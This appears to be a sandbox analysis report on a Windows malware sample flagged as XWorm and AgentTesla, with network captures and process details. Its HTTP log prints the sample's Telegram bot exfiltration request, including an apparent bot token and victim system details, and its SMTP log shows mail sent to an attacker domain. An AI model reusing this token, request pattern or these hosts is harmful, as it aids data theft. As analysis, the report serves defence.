                                                                                  Nov 25, 2024 15:37:36.586534977 CET498061717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:37:36.706866026 CET17174980689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:37:37.434652090 CET498061717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:37:37.554749012 CET17174980689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:37:40.082515955 CET17174980689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:37:40.082655907 CET498061717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:37:41.591299057 CET498061717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:37:41.592200041 CET498561717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:37:41.716840982 CET17174980689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:37:41.716857910 CET17174985689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:37:41.716970921 CET498561717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:37:41.738238096 CET498561717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:37:41.860450029 CET17174985689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:37:46.169111013 CET498561717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:37:46.289196014 CET17174985689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:37:46.825613976 CET498561717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:37:46.948570013 CET17174985689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:37:46.948633909 CET498561717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:37:47.068926096 CET17174985689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:37:47.068989992 CET498561717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:37:47.189153910 CET17174985689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:37:51.263117075 CET498561717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:37:51.389348984 CET17174985689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:37:55.219010115 CET498561717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:37:55.469080925 CET17174985689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:37:57.484554052 CET498561717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:37:57.604497910 CET17174985689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:37:58.278601885 CET498561717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:37:58.399355888 CET17174985689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:37:58.399403095 CET498561717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:37:58.519670963 CET17174985689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:37:58.700515032 CET498561717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:37:58.913577080 CET17174985689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:01.781259060 CET49705587192.168.2.5162.254.34.31
                                                                                  Nov 25, 2024 15:38:01.922498941 CET58749705162.254.34.31192.168.2.5
                                                                                  Nov 25, 2024 15:38:02.163774014 CET58749705162.254.34.31192.168.2.5
                                                                                  Nov 25, 2024 15:38:02.163791895 CET58749705162.254.34.31192.168.2.5
                                                                                  Nov 25, 2024 15:38:02.163867950 CET49705587192.168.2.5162.254.34.31
                                                                                  Nov 25, 2024 15:38:02.163976908 CET49705587192.168.2.5162.254.34.31
                                                                                  Nov 25, 2024 15:38:02.284667969 CET58749705162.254.34.31192.168.2.5
                                                                                  Nov 25, 2024 15:38:03.652617931 CET17174985689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:03.652687073 CET498561717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:08.481930017 CET498561717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:08.484034061 CET499131717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:08.602613926 CET17174985689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:08.604975939 CET17174991389.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:08.605068922 CET499131717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:08.634867907 CET499131717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:08.758608103 CET17174991389.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:08.758671045 CET499131717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:08.885420084 CET17174991389.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:08.885499954 CET499131717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:09.009804010 CET17174991389.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:09.009884119 CET499131717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:09.129853964 CET17174991389.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:10.731682062 CET499131717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:10.851682901 CET17174991389.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:14.216036081 CET499131717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:14.335956097 CET17174991389.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:19.326797962 CET499131717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:19.450186968 CET17174991389.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:19.469283104 CET499131717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:19.590806007 CET17174991389.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:28.419130087 CET499131717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:28.539211988 CET17174991389.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:30.231813908 CET499131717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:30.352139950 CET17174991389.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:30.352214098 CET499131717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:30.474231005 CET17174991389.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:30.513076067 CET17174991389.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:30.513145924 CET499131717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:30.514244080 CET499131717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:30.515546083 CET499611717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:30.634522915 CET17174991389.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:30.662224054 CET17174996189.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:30.662312031 CET499611717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:30.687355995 CET499611717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:30.808187962 CET17174996189.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:30.841073990 CET499611717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:30.961476088 CET17174996189.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:30.961545944 CET499611717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:31.083446980 CET17174996189.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:40.435451984 CET499611717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:40.555836916 CET17174996189.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:41.669017076 CET499611717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:41.789226055 CET17174996189.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:46.919327974 CET499611717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:47.039938927 CET17174996189.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:47.091120958 CET499611717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:47.211934090 CET17174996189.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:52.646394014 CET17174996189.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:52.646470070 CET499611717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:57.231628895 CET499611717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:57.234869957 CET499851717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:57.353754997 CET17174996189.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:57.355071068 CET17174998589.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:38:57.355417967 CET499851717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:57.372751951 CET499851717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:38:57.492952108 CET17174998589.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:01.028656006 CET499851717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:01.154001951 CET17174998589.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:01.843379021 CET499851717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:02.140701056 CET17174998589.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:02.544101000 CET499851717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:02.667670012 CET17174998589.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:02.667737007 CET499851717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:02.788516998 CET17174998589.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:02.788563013 CET499851717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:02.911818027 CET17174998589.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:05.044255972 CET499851717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:05.188520908 CET17174998589.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:06.355285883 CET499851717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:06.475358009 CET17174998589.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:11.013063908 CET499851717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:11.154827118 CET17174998589.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:12.700413942 CET499851717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:12.820470095 CET17174998589.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:12.981554031 CET499851717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:13.102833986 CET17174998589.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:19.302583933 CET17174998589.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:19.302648067 CET499851717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:23.262799978 CET499851717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:23.265784025 CET499861717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:23.387221098 CET17174998589.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:23.390176058 CET17174998689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:23.393450975 CET499861717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:23.410497904 CET499861717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:23.537347078 CET17174998689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:25.575287104 CET499861717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:25.751666069 CET17174998689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:38.309710979 CET499861717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:38.429846048 CET17174998689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:39.309736013 CET499861717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:39.430098057 CET17174998689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:39.431746006 CET499861717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:39.551879883 CET17174998689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:39.795427084 CET499861717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:39.920881033 CET17174998689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:42.575504065 CET499861717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:42.697204113 CET17174998689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:44.638061047 CET499861717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:44.758213997 CET17174998689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:44.758265972 CET499861717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:44.878259897 CET17174998689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:44.888190031 CET499861717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:45.008212090 CET17174998689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:45.008285999 CET499861717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:45.128770113 CET17174998689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:45.128818989 CET499861717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:45.249113083 CET17174998689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:45.249172926 CET499861717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:45.365629911 CET17174998689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:45.365699053 CET499861717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:45.365775108 CET499861717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:45.367821932 CET499871717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:45.371934891 CET17174998689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:45.492324114 CET17174998689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:45.492346048 CET17174998689.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:45.494498968 CET17174998789.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:45.494637966 CET499871717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:45.525410891 CET499871717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:45.647073984 CET17174998789.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:46.653628111 CET499871717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:46.817116022 CET17174998789.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:46.817372084 CET499871717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:47.046274900 CET17174998789.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:47.046350002 CET499871717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:47.169305086 CET17174998789.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:56.295425892 CET499871717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:56.415806055 CET17174998789.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:39:58.497627974 CET499871717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:39:58.617973089 CET17174998789.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:40:03.638676882 CET499871717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:40:03.758744001 CET17174998789.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:40:03.758836985 CET499871717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:40:03.879014969 CET17174998789.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:40:03.983506918 CET499871717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:40:04.107280016 CET17174998789.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:40:04.173465967 CET499871717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:40:04.293706894 CET17174998789.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:40:07.413423061 CET17174998789.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:40:07.413497925 CET499871717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:40:08.965887070 CET499871717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:40:08.968673944 CET499881717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:40:09.086004019 CET17174998789.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:40:09.114708900 CET17174998889.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:40:09.114798069 CET499881717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:40:09.136785984 CET499881717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:40:09.258560896 CET17174998889.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:40:09.997370958 CET499881717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:40:10.117438078 CET17174998889.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:40:11.669154882 CET499881717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:40:11.789186954 CET17174998889.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:40:12.387965918 CET499881717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:40:12.509907007 CET17174998889.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:40:13.075401068 CET499881717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:40:13.196583033 CET17174998889.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:40:13.840946913 CET499881717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:40:13.967153072 CET17174998889.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:40:19.388103008 CET499881717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:40:19.511447906 CET17174998889.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:40:21.810177088 CET499881717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:40:22.068439007 CET17174998889.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:40:24.544785023 CET499881717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:40:24.664972067 CET17174998889.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:40:31.054116964 CET17174998889.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:40:31.054227114 CET499881717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:40:36.044013023 CET499881717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:40:36.044823885 CET499891717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:40:36.165395021 CET17174998889.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:40:36.166178942 CET17174998989.40.31.232192.168.2.5
                                                                                  Nov 25, 2024 15:40:36.166282892 CET499891717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:40:36.181252956 CET499891717192.168.2.589.40.31.232
                                                                                  Nov 25, 2024 15:40:36.302171946 CET17174998989.40.31.232192.168.2.5
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Nov 25, 2024 15:36:18.994394064 CET5982453192.168.2.51.1.1.1
                                                                                  Nov 25, 2024 15:36:19.145001888 CET53598241.1.1.1192.168.2.5
                                                                                  Nov 25, 2024 15:36:22.549665928 CET5576853192.168.2.51.1.1.1
                                                                                  Nov 25, 2024 15:36:22.702313900 CET53557681.1.1.1192.168.2.5
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Nov 25, 2024 15:36:18.994394064 CET192.168.2.51.1.1.10xc92eStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 15:36:22.549665928 CET192.168.2.51.1.1.10xa7d6Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Nov 25, 2024 15:36:19.145001888 CET1.1.1.1192.168.2.50xc92eNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 15:36:19.145001888 CET1.1.1.1192.168.2.50xc92eNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 15:36:19.145001888 CET1.1.1.1192.168.2.50xc92eNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                  Nov 25, 2024 15:36:22.702313900 CET1.1.1.1192.168.2.50xa7d6No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                  • api.ipify.org
                                                                                  • api.telegram.org
                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.549704104.26.13.2054436404C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-25 14:36:20 UTC155OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                  Host: api.ipify.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-11-25 14:36:21 UTC399INHTTP/1.1 200 OK
                                                                                  Date: Mon, 25 Nov 2024 14:36:20 GMT
                                                                                  Content-Type: text/plain
                                                                                  Content-Length: 11
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e825ed6de4c0f98-EWR
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1499&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1889967&cwnd=174&unsent_bytes=0&cid=abcb4b9d2972d40c&ts=644&x=0"
                                                                                  2024-11-25 14:36:21 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                                                  Data Ascii: 8.46.123.75


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.549706149.154.167.2204434444C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-25 14:36:24 UTC446OUTGET /bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEB01AAE6F744B3247914%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20LYRNOABZ9%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024 HTTP/1.1
                                                                                  Host: api.telegram.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-11-25 14:36:25 UTC388INHTTP/1.1 200 OK
                                                                                  Server: nginx/1.18.0
                                                                                  Date: Mon, 25 Nov 2024 14:36:24 GMT
                                                                                  Content-Type: application/json
                                                                                  Content-Length: 444
                                                                                  Connection: close
                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                  2024-11-25 14:36:25 UTC444INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 36 33 30 38 39 34 31 38 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 74 65 76 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 74 65 76 65 62 6f 74 32 78 32 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 39 33 30 32 38 37 35 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 61 74 68 75 64 64 6c 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 68 75 64 64 6c 65 6d 61 6e 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 35 34 35 33 38 34 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 32 30 20 5b 58 57
                                                                                  Data Ascii: {"ok":true,"result":{"message_id":12542,"from":{"id":5630894183,"is_bot":true,"first_name":"steve","username":"stevebot2x2bot"},"chat":{"id":793028759,"first_name":"sathuddle","username":"huddleman01","type":"private"},"date":1732545384,"text":"\u2620 [XW


                                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                                  Nov 25, 2024 15:36:23.238554955 CET58749705162.254.34.31192.168.2.5220 server1.educt.shop127.0.0.1 ESMTP Postfix
                                                                                  Nov 25, 2024 15:36:23.273309946 CET49705587192.168.2.5162.254.34.31EHLO 910646
                                                                                  Nov 25, 2024 15:36:23.694010019 CET58749705162.254.34.31192.168.2.5250-server1.educt.shop127.0.0.1
                                                                                  250-PIPELINING
                                                                                  250-SIZE 204800000
                                                                                  250-ETRN
                                                                                  250-STARTTLS
                                                                                  250-AUTH PLAIN LOGIN
                                                                                  250-AUTH=PLAIN LOGIN
                                                                                  250-ENHANCEDSTATUSCODES
                                                                                  250-8BITMIME
                                                                                  250-DSN
                                                                                  250 CHUNKING
                                                                                  Nov 25, 2024 15:36:23.694900036 CET49705587192.168.2.5162.254.34.31AUTH login c2VuZHhhbWJyb0BlZHVjdC5zaG9w
                                                                                  Nov 25, 2024 15:36:24.136125088 CET58749705162.254.34.31192.168.2.5334 UGFzc3dvcmQ6
                                                                                  Nov 25, 2024 15:36:24.550875902 CET58749705162.254.34.31192.168.2.5235 2.7.0 Authentication successful
                                                                                  Nov 25, 2024 15:36:24.551141977 CET49705587192.168.2.5162.254.34.31MAIL FROM:<sendxambro@educt.shop>
                                                                                  Nov 25, 2024 15:36:24.947067022 CET58749705162.254.34.31192.168.2.5250 2.1.0 Ok
                                                                                  Nov 25, 2024 15:36:24.947577953 CET49705587192.168.2.5162.254.34.31RCPT TO:<ambro@educt.shop>
                                                                                  Nov 25, 2024 15:36:25.342144012 CET58749705162.254.34.31192.168.2.5250 2.1.5 Ok
                                                                                  Nov 25, 2024 15:36:25.342322111 CET49705587192.168.2.5162.254.34.31DATA
                                                                                  Nov 25, 2024 15:36:25.736237049 CET58749705162.254.34.31192.168.2.5354 End data with <CR><LF>.<CR><LF>
                                                                                  Nov 25, 2024 15:36:25.737209082 CET49705587192.168.2.5162.254.34.31.
                                                                                  Nov 25, 2024 15:36:26.256926060 CET58749705162.254.34.31192.168.2.5250 2.0.0 Ok: queued as 25D1F76966
                                                                                  Nov 25, 2024 15:38:01.781259060 CET49705587192.168.2.5162.254.34.31QUIT
                                                                                  Nov 25, 2024 15:38:02.163774014 CET58749705162.254.34.31192.168.2.5221 2.0.0 Bye

                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to dive into process behavior distribution

                                                                                  Click to jump to process

                                                                                  Target ID:0
                                                                                  Start time:09:36:16
                                                                                  Start date:25/11/2024
                                                                                  Path:C:\Users\user\Desktop\DJ5PhUwOsM.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\DJ5PhUwOsM.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:335'872 bytes
                                                                                  MD5 hash:D61526463472DA19DD8869F484A8F4EF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
